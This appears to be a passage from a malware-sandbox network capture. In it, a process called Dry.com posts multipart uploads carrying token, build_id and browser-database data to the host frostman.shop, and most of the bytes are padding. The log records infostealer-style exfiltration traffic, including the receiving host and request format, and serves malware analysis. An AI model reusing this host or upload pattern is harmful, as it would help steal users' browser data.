                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                          Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                          2024-12-21 00:15:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:33 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          28192.168.2.550087116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVS
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 52 49 4d 4f 48 34 57 4c 58 42 49 4d 59 4d 47 34 4f 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------RIMOH4WLXBIMYMG4OHVSCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:34 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          29192.168.2.550106116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------V3WLNGD26F3EU3W4O8GVCont
